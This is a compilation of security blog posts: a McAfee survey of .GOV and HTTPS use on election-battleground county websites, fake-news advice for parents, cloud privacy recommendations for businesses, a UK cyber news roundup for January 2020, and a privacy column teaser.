The lack of .gov in a website name means that no controlling government authority has validated that the website in question is legitimate.

When website visitors see the HTTPS and a lock icon in the address of a website they are visiting, this means that their browser has made a secure connection with that website through a technology called Secure Sockets Layer (SSL). While SSL sounds technical, the security it delivers is easy to understand. These signifiers simply tell visitors that any personal voter registration information that they share with those websites is encrypted and cannot be intercepted and stolen by hackers while they are visiting the site.

 

Additionally, and more importantly to the election disinformation issue, they also tell visitors that they cannot be re-routed against their will from legitimate government websites to other websites pretending to be government websites.

What McAfee’s survey found

McAfee’s January 2020 survey researched states projected by U.S. election prognosticators to be pivotal in determining the victor in the 2020 Presidential Elections. States surveyed include Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

State counties lacking .GOV validation

Of the 1,117 counties in the survey group, 83.3% of their websites lack .GOV validation. Minnesota ranked the lowest among the surveyed states in terms of .GOV website validation with 95.4% of counties lacking U.S. government certification. Other states severely lacking in .GOV coverage included Texas (94.9%), New Hampshire (90.0%), Michigan (89.2%), Iowa (88.9%), Nevada (87.5%), and Pennsylvania (83.6%).

Arizona had the highest percentage of main county websites validated by .GOV with 66.7% coverage, but even this percentage suggests that a third of the Grand Canyon State’s county websites are unvalidated and that hundreds of thousands of voters could still be subjected to disinformation schemes.

State counties lacking HTTPS protection

McAfee’s survey found that 46.6% of county websites lack HTTPS encryption. Texas ranked the lowest in terms of encryption with 77.2% of its county websites failing to protect citizens visiting these web properties. Other states with counties lacking in encryption included Pennsylvania (46.3%), Minnesota (42.5%), and Georgia (38.4%).

Assessment of Iowa and New Hampshire

In Iowa, 88.9% of county websites lack .GOV validation, and as many as 29.3% lack HTTPS encryption. Ninety percent of New Hampshire’s county websites lack .GOV validation, and as many as 30% of the Granite State’s counties lack encryption.

Inconsistent naming standards

McAfee’s research found that some states attempted to establish standard naming standards, such as www.co.[county name].[two-letter state abbreviation].us. Unfortunately, these formats were followed so inconsistently that a voter seeking election information from her county website cannot be confident that a web domain following such a standard is indeed a legitimate site.

Easy-to-remember naming formats

McAfee found 103 cases in which counties set up easy-to-remember, user-friendly domain names to make their election information easier to remember and access for the broadest possible audience of citizens. Examples include www.votedenton.com, www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com. While 93 of these counties (90.2%) protected voters visiting these sites with encryption, only two validated these special domains and websites with .GOV. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.

.GOV and elections

The lack of .gov matters because, without an official government body validating whether websites truly belong to the government entities they claim, it’s possible for malicious actors to spoof legitimate government sites with fraudulent websites.

If a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county’s electorate from voting.

If the malicious actor can launch such a digital disinformation campaign close enough to election day, he could reach a critical mass of voters. If he does so before county and state officials become aware of the campaign, it could be very difficult for the officials to counter the disinformation before voter behavior is impacted.

If the actor can successfully disrupt the voting behavior of just tens of thousands of citizens in these key states, their votes may not be counted or their confidence in the validity of election results and even legitimacy of the democratic process overall could be badly shaken.

Ultimately, if a malicious actor seeks to undermine confidence in America’s system of government, such a digital disinformation campaign can succeed in damaging confidence in the electoral process, even if he cannot succeed in impacting actual votes.

Ohio’s Strategy for transitioning to .GOV

While only 19.3% of Ohio’s 88 county main websites have .GOV validation, the state leads McAfee’s survey with 76.1% of county election websites and webpages validated by .GOV certification.

This leadership position appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain (i.e. https://www.boe.ohio.gov/vanwert/). See here for a complete list of Ohio county election websites.

Such a .GOV transition strategy constitutes an interim solution until more comprehensive efforts are made at the state and federal government level through initiatives such as The DOTGOV Act of 2020. This legislation would require the Department of Homeland Security (DHS) to support .GOV adoption for local governments with technical guidance and financial support.

Please see the following for more information on this subject:

 

 

 

The post U.S. Battleground County Website Security Survey appeared first on McAfee Blogs.

Spotting Fake News: Teaching Kids to be Responsible Online Publishers

fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing that a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Top 10 Cloud Privacy Recommendations for Businesses

In the corporate world, privacy refers to employee/business data as well as customer/supplier data—you must safeguard both of them. Laws such as CCPA and GDPR, not to mention vertical market regulations, make it clear how important this issue is to regulators, who take into account the security tools in use and their settings during investigations. (Fines can be significantly lower if tools are well deployed.)

As businesses continue to accelerate to the cloud, there’s no better time to review all aspects of cloud data collection, use, storage, transfer and processing.

  1. Investigate shadow IT, unsanctioned cloud providers and THEIR security

The organization’s data can easily leak via shadow cloud services; for example, users converting a PDF of the employee phone list, translating a project plan, or using a cloud-based presentation tool or unmanaged collaboration services. The corporation is responsible for data loss from its employees, no matter how it occurs. So IT needs visibility into all cloud services, even those set up by individual users or small groups. Once you have a comprehensive picture of unsanctioned cloud usage, this information should be shared with the purchasing team to help them decide which services to approve.

  1. Integrate with global SSO

Global single sign-on services can ensure that users’ access is removed from all services when they leave the organization, as well as reduce the risk of data loss from password reuse. In a non-SSO service, users often call the helpdesk team when they’ve forgotten their passwords , so SSO has the added benefit of reducing call volume.

  1. Work with GRC and workshop how users use cloud

GRC (governance, risk and compliance) should be brought in to help define cloud use policies. Often, they are unsure how clouds are being used and what data is being uploaded, and therefore policies are general. Create a team including users, GRC and IT security to define policies for the real world by reviewing the possible actions that can be taken in each particular cloud service and ensure policies are defined for all eventualities.

  1. Review IaaS – Don’t assume DevOps did everything right

The fastest-growing area of cloud is IaaS—AWS, Azure and Google Cloud Platform. Here, it is very easy for developers to misconfigure the settings and leave data open to attackers.  Technology is needed to check for all IaaS services (we always find more than people believe they have) and their settings—ideally, this would be a system that can automatically change settings to secure options.

  1. Keep up to date with technology—serverless, containers, cloud email services, etc.

The cloud includes many technologies that are constantly evolving; therefore, security needs to change too. Developers are often at the forefront of technological advances—bringing in code from GitHub, running container systems that only live for a few minutes (even this isn’t too short a time to require safeguarding) and more. IT security needs to be in partnership with the development teams and deploy technologies to defend against the latest threats.

  1. Integrate with web gateway and DLP—don’t lose security as you move to cloud

After investing time and money over the last decade on security, you don’t want to lose that investment when moving to the cloud. As systems and data are moved skyward, you should deploy technologies that can integrate with your existing services and technology. For example, you shouldn’t have two different DLP models depending on the computing services used by your employees. Deploy systems that can integrate with each other, preferably with a single-pane-of-glass management system.

  1. Don’t assume CSPs will keep your logs forever

If the worst happens, you need to investigate the history of a data loss incident. CSPs will rarely save data logs forever—refer to your contract to find out how long they keep logs, and consider having your own logs so that forensic investigations can be executed even if the original data loss incident was some time ago.

  1. Consider differential policies based on location, device, etc.

Once data is in the cloud, the whole idea is to facilitate global working. Is that always appropriate? For example, what if an employee wants to download a sensitive corporate document via a cloud service to an unmanaged device? Consider the situations your employees will encounter, and form policy that provides the maximum amount of security required while causing the least amount of disruption possible.

  1. Promote the clouds you DO like to your users

Carrots work better than sticks to train users. Don’t just block the services you don’t like, promote widely the cloud services you approve of, those that conform to your security needs, your performance indicators and capabilities. Promote them via the intranet, blogs and internal marketing, and redirect requests to unsupported services back to those you like.

  1. Privacy and security is everyone’s responsibility: Bring in other departments and users

Perhaps the last recommendation should be the first: Use every method available to train users, but before you do, work with those users and their representatives to define appropriate policies. The aim is to encourage users to use cloud services that are not only safe, but will allow them to be as productive as possible. The users themselves typically have great ideas of the services they’d like to use, why and how, so bring them in to help define the policies and work together with GRC.

Here’s to successful and secure cloud deployment, and to keeping your users and customer personal data as secure as you can in 2020 and beyond.

For more information, take a look at our additional resource on safeguarding your personal data in the cloud . 

The post Top 10 Cloud Privacy Recommendations for Businesses appeared first on McAfee Blogs.

Cyber Security Roundup for February 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

After years of dither and delay the UK government finally nailed its colours to the mast, no not Brexit but Huawei, permitting 'limited use' of the Chinese Telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary, either its a clever compromise or a complete sell out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is playing a delicate balancing to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and United States. An outright US style ban Huawei would seriously jeopardise billions of pounds worth of Chinese investment into the UK economy. While on the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high risk network providers on the use of Huawei tech.
UK Gov agrees to 'limited' Huawei involvement within UK 5G

UK business targeted ransomware continues to rear its ugly head in 2020, this time global foreign exchange firm Travelex's operations were all brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included their UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsburys, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently previously detected and warned Travelex about many months earlier. Could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and had also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached, however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what was described by German automotive parts supplier Gedia Automotive Group, as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched their server VPN on 4th January.

Leeds based medical tech company Tissue Regenix halted its US manufacturing operation after unauthorised party accessed its IT systems. To date there hasn't been any details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following their cyber attack disclosure.

London based marine consultancy company LOC was hacked and held to be ransom by cybercriminals. It was reported computers were 'locked' and 300Gb of company data were stolen by a criminal group, investigations on this hack are still ongoing.

Its seem every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of leading global cloud providers, Microsoft, to be caught out by such a school boy error. Microsoft reported a database misconfiguration of their Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties had accessed any of the leaked data.

Cyber attacks against the UK defence industry hit unprecedented highs according government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

It was another fairly busy month for Microsoft patches, including an NSA revealed critical flaw in Windows 10. January also saw the end of security updates support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

According to a World Economic Forum (WEF) study, most of the world's airports cybersecurity is not up to scratch. WEF reported 97 of the world’s 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. Findings summary were:

  • 97% of the websites contain outdated web software.
  • 24% of the websites contain known and exploitable vulnerabilities.
  • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
  • 100% of the mobile apps contain at least five external software frameworks.
  • 100% of the mobile apps contain at least two vulnerabilities.
Elsewhere in the world, it was reported a US Department of Defence contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of the Superbowl LIV Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, which said it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And a ransomware took a US Maritime base offline for 30 hours.

Dallas County Attorney finally applied some common-sense, dropping charges against two Coalfire Red Teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said upon arrest the two men stated, “they were contracted to break into the building for Iowa courts to check the security of the building". After the charges were dropped at the end of January Coalfire CEO Tom McAndrew said, 'With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement”. Adding “We’re grateful to the global security community for their support throughout this experience.”


BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

Will we just accept our loss of privacy, or has the techlash already begun? | Alan Rusbridger

Not so long ago we searched Google. Now we seem quite happy to let Google search us

Probably too late to ask, but was the past year the moment we lost our technological innocence? The Alexa in the corner of the kitchen monitoring your every word? The location-betraying device in your pocket? The dozen trackers on that web page you just opened? The thought that a 5G network could, in some hazily understood way, be hardwired back to Beijing? The spooky use of live facial recognition on CCTV cameras across London.

With privacy there have been so many landmarks in the past 12 months. The $5bn Federal Trade Commission fine on Facebook to settle the Cambridge Analytica scandal? The accidental exposure of a mind-blowing 1.2 billion people’s details from two data enrichment companies? Up to 50m medical records spilled?

We gleefully carry surveillance machines in our pockets and install them in our homes

Related: Cybercrime laws need urgent reform to protect UK, says report

Continue reading...